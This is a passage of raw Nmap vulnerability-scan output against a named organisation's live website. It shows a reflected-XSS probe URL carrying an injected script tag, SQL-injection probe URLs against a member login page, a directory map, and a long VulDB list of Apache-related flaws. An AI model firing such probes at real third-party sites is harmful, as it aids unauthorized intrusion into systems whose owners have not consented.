4706| http://www.pglfe.org/dgracfe_reg/registrar_login.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
4707| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.pglfe.org
4708| References:
4709| https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
4710|_ http://php.net/manual/en/reserved.variables.server.php
4711| http-security-headers:
4712| Cache_Control:
4713| Header: Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
4714| Pragma:
4715| Header: Pragma: no-cache
4716| Expires:
4717|_ Header: Expires: Thu, 19 Nov 1981 08:52:00 GMT
4718|_http-server-header: Apache
4719| http-sitemap-generator:
4720| Directory structure:
4721| /
4722| Other: 1; php: 5
4723| /_include/css/
4724| css: 1
4725| /_include/images/
4726| jpg: 1; png: 2
4727| /_include/images/lodges-racs-km-logo/
4728| jpg: 3
4729| /_include/js/
4730| js: 5
4731| /pglfe_sec/
4732| php: 1
4733| Longest directory structure:
4734| Depth: 3
4735| Dir: /_include/images/lodges-racs-km-logo/
4736| Total files found (by extension):
4737|_ Other: 1; css: 1; jpg: 4; js: 5; php: 6; png: 2
4738| http-sql-injection:
4739| Possible sqli for queries:
4740| http://www.pglfe.org:80/members/member_login.php?to_page=photos%27%20OR%20sqlspider
4751|_ http://www.pglfe.org:80/members/member_login.php?to_page=photos%27%20OR%20sqlspider
4752|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
4753|_http-title: Provincial Grand Lodge of the Far East
4754| http-vhosts:
4755| 126 names had status 403
4756|_www.pglfe.org : 200
4757|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
4758|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
4759|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
4760|_http-xssed: No previously reported XSS vuln.
4761| vulscan: VulDB - https://vuldb.com:
4762| [141649] Apache OFBiz up to 16.11.05 Form Widget Freemarker Markup Code Execution
4763| [141648] Apache OFBiz up to 16.11.05 Application Stored cross site scripting
4764| [140386] Apache Commons Beanutils 1.9.2 BeanIntrospector unknown vulnerability
4765| [139708] Apache Ranger up to 1.2.0 Policy Import cross site scripting
4766| [139540] cPanel up to 60.0.24 Apache HTTP Server Key information disclosure
4767| [139386] Apache Tike up to 1.21 RecursiveParserWrapper Stack-based memory corruption
4768| [139385] Apache Tika 1.19/1.20/1.21 SAXParsers Hang denial of service
4769| [139384] Apache Tika up to 1.21 RecursiveParserWrapper ZIP File denial of service
4770| [139261] Apache Solr 8.2.0 DataImportHandler Parameter unknown vulnerability
4771| [139259] cPanel up to 68.0.26 WHM Apache Includes Editor information disclosure
4772| [139256] cPanel up to 68.0.26 WHM Apache Configuration Include Editor cross site scripting
4773| [139239] cPanel up to 70.0.22 Apache HTTP Server Log information disclosure
4774| [139141] Apache ActiveMQ Client up to 5.15.4 ActiveMQConnection.java ActiveMQConnection denial of service
4775| [139130] cPanel up to 73.x Apache HTTP Server Injection privilege escalation
4776| [138914] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 VM sql injection
4777| [138913] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Block Argument privilege escalation
4778| [138912] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Cookie sql injection
4779| [138816] Apache Storm up to 1.2.2 Logviewer Daemon Log information disclosure
4780| [138815] Apache Storm up to 1.2.2 UI Daemon Deserialization privilege escalation
4781| [138164] Oracle 2.7.0.1 Apache Log4j unknown vulnerability
4782| [138155] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Tomcat unknown vulnerability
4783| [138151] Oracle Transportation Management 6.3.7 Apache Tomcat unknown vulnerability
4784| [138149] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Commons FileUpload unknown vulnerability
4785| [138131] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Tomcat unknown vulnerability
4786| [138129] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
4787| [138123] Oracle Retail Order Management System 5.0 Apache Struts 1 unknown vulnerability
4788| [138122] Oracle Retail Order Broker 5.2/15.0 Apache Tomcat unknown vulnerability
4789| [138121] Oracle Retail Order Broker 5.2/15.0 Apache CXF unknown vulnerability
4790| [138112] Oracle Retail Integration Bus 15.0/16.0 Apache Commons FileUpload unknown vulnerability
| [138111] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Commons FileUpload unknown vulnerability
| [138103] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56/8.57 Apache WSS4J information disclosure
| [138053] Oracle JD Edwards EnterpriseOne Tools 9.2 Apache Log4j unknown vulnerability
| [138036] Oracle Insurance Rules Palette 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
| [138035] Oracle Insurance Policy Administration J2EE 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
| [138034] Oracle Insurance Calculation Engine 9.7/10.0/10.1/10.2 Apache Commons FileUpload unknown vulnerability
| [138028] Oracle Identity Manager 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
| [138020] Oracle BI Publisher 11.1.1.9.0 Apache Tomcat unknown vulnerability
| [138019] Oracle BI Publisher (formerly XML Publisher) 11.1.1.9.0 Apache Tomcat unknown vulnerability
| [138017] Oracle Outside In Technology 8.5.4 Apache Commons FileUpload unknown vulnerability
| [138013] Oracle Outside In Technology 8.5.4 Apache Tomcat unknown vulnerability
| [138012] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
| [138009] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
| [138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service
| [138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service
| [138006] Oracle Enterprise Repository 12.1.3.0.0 Apache CXF denial of service
| [138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
| [137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
| [137995] Oracle Hospitality Simphony 18.2.1 Apache WSS4J information disclosure
| [137987] Oracle FLEXCUBE Universal Banking up to 12.0.3/12.4.0/14.2.0 Apache Log4j unknown vulnerability
| [137981] Oracle Insurance IFRS 17 Analyzer 8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
| [137980] Oracle Insurance Data Foundation 8.0.4/8.0.5/8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
| [137979] Oracle 8.0.8 Apache Commons FileUpload unknown vulnerability
| [137973] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Batik unknown vulnerability
| [137970] Oracle Financial Services Profitability Management 8.0.4/8.0.5/8.0.6/8.0.7 Apache ActiveMQ unknown vulnerability
| [137967] Oracle up to 8.0.7 Apache httpd unknown vulnerability
| [137966] Oracle 8.0.7/8.0.8 Apache Groovy unknown vulnerability
| [137965] Oracle Financial Services Liquidity Risk Management 8.0.1/8.0.2/8.0.4/8.0.5/8.0.6 Apache Commons FileUpload unknown vulnerability
| [137964] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Log4j unknown vulnerability
| [137933] Oracle Banking Platform up to 2.7.1 Apache Tika unknown vulnerability
| [137926] Oracle Enterprise Manager for Fusion Middleware 13.2/13.3 Apache Commons FileUpload information disclosure
| [137924] Oracle Enterprise Manager Base Platform 12.1.0.5.0/13.2.0.0.0/13.3.0.0.0 Apache Commons FileUpload unknown vulnerability
| [137914] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
| [137913] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
| [137911] Oracle E-Business Suite up to 12.2.8 Apache HTTP Server unknown vulnerability
| [137910] Oracle E-Business Suite up to 12.2.8 Apache CXF information disclosure
| [137909] Oracle E-Business Suite up to 12.2.8 Apache Commons FileUpload unknown vulnerability
| [137905] Oracle Primavera Gateway 15.2/16.2/17.12/18.8 Apache Tika denial of service
| [137901] Oracle Primavera Unifier up to 18.8 Apache HTTP Server unknown vulnerability
| [137895] Oracle Instant Messaging Server 10.0.1.2.0 Apache Tika information disclosure
| [137894] Oracle EAGLE (Software) 46.5/46.6/46.7 Apache Tomcat information disclosure
| [137892] Oracle Online Mediation Controller 6.1 Apache Batik denial of service
| [137891] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Tomcat unknown vulnerability
| [137885] Oracle Diameter Signaling Router (DSR) 8.0/8.1/8.2 Apache cxf unknown vulnerability
| [137882] Oracle Unified 8.0.0.2.0 Apache Commons FileUpload unknown vulnerability
| [137881] Oracle Online Mediation Controller 6.1 Apache Commons FileUpload unknown vulnerability
| [137880] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Log4j unknown vulnerability
| [137879] Oracle Convergence 3.0.2 Apache Commons FileUpload unknown vulnerability
| [137876] Oracle Application Session Controller 3.7.1/3.8.0 Apache Commons FileUpload unknown vulnerability
| [137829] Apache Roller 5.2.3 Math Comment Authenticator Reflected cross site scripting
| [137736] Apache Kafka 0.11.0.0/2.1.0 ACL Validation Request privilege escalation
| [136858] MakerBot Replicator 5G Printer Apache HTTP Server information disclosure
| [136849] Analogic Poste.io 2.1.6 on Apache RoundCube logs/ information disclosure
| [136822] Apache Tomcat up to 8.5.40/9.0.19 Incomplete Fix CVE-2019-0199 Resource Exhaustion denial of service
| [136808] Apache Geode up to 1.8.0 Secure Mode privilege escalation
| [136646] Apache Allura up to 1.10.x Dropdown Selector Stored cross site scripting
| [136374] Apache HTTP Server up to 2.4.38 Slash Regular Expression unknown vulnerability
| [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 Request Crash denial of service
| [136372] Apache HTTP Server up to 2.4.38 HTTP2 Request unknown vulnerability
| [136370] Apache Fineract up to 1.2.x sql injection
| [136369] Apache Fineract up to 1.2.x sql injection
| [135731] Apache Hadoop up to 2.8.4/2.9.1/3.1.0 yarn privilege escalation
| [135664] Apache Tomcat up to 7.0.93/8.5.39/9.0.0.17 SSI printenv Command cross site scripting
| [135663] Apache Camel up to 2.23.x JSON-lib Library XML Data XML External Entity
| [135661] Apache Roller up to 5.2.1/5.2.0 XML-RPC Interface XML File Server-Side Request Forgery
| [135402] Apache Zookeeper up to 3.4.13/3.5.0-alpha to 3.5.4-beta getACL() information disclosure
| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
| [134416] Apache Sanselan 0.97-incubator Loop denial of service
| [134415] Apache Sanselan 0.97-incubator Hang denial of service
| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
| [131859] Apache Hadoop up to 2.9.1 privilege escalation
| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
| [130629] Apache Guacamole Cookie Flag weak encryption
| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
| [130123] Apache Airflow up to 1.8.2 information disclosure
| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
| [127007] Apache Spark Request Code Execution
| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
| [126346] Apache Tomcat Path privilege escalation
| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
| [123197] Apache Sentry up to 2.0.0 privilege escalation
| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
| [122800] Apache Spark 1.3.0 REST API weak authentication
| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
| [121354] Apache CouchDB HTTP API Code Execution
| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
| [120168] Apache CXF weak authentication
| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
| [119306] Apache MXNet Network Interface privilege escalation
| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
| [118143] Apache NiFi activemq-client Library Deserialization denial of service
| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
| [117115] Apache Tika up to 1.17 tika-server command injection
| [116929] Apache Fineract getReportType Parameter privilege escalation
| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
| [116926] Apache Fineract REST Parameter privilege escalation
| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
| [115883] Apache Hive up to 2.3.2 privilege escalation
| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
| [115518] Apache Ignite 2.3 Deserialization privilege escalation
| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
